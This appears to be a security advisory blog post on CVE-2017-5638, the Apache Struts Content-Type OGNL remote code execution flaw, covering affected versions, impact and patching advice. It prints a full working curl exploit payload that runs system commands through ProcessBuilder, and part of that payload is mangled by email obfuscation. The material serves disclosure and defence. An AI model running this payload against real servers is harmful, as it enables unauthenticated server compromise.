Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts. The flaw is triggered when a malicious `Content-Type` header is sent in an HTTP request for file upload. The parser incorrectly processes the header value, attempting to evaluate it as an Object-Graph Navigation Language (OGNL) expression. An attacker can craft a `Content-Type` header containing a malicious OGNL expression. Because the evaluation occurs with insufficient safeguards, this allows the attacker to execute arbitrary system commands on the server with the same privileges as the Struts application. This provides a direct path to full server compromise without requiring authentication, making it a highly critical remote code execution flaw.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-showcase/fileupload/doUpload.action

How Exploit:

Craft malicious Content-Type header.

Send HTTP request with OGNL payload.

Execute arbitrary system commands.

Gain remote shell access.

Protection from this CVE:

Upgrade to Struts 2.3.32 or 2.5.10.1.

Apply vendor security patch immediately.

Implement WAF rules filtering OGNL patterns.

Disable file upload functionality if unused.

Impact:

Complete server compromise.

Unauthenticated remote code execution.

Data breach and system control.

Critical infrastructure risk.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top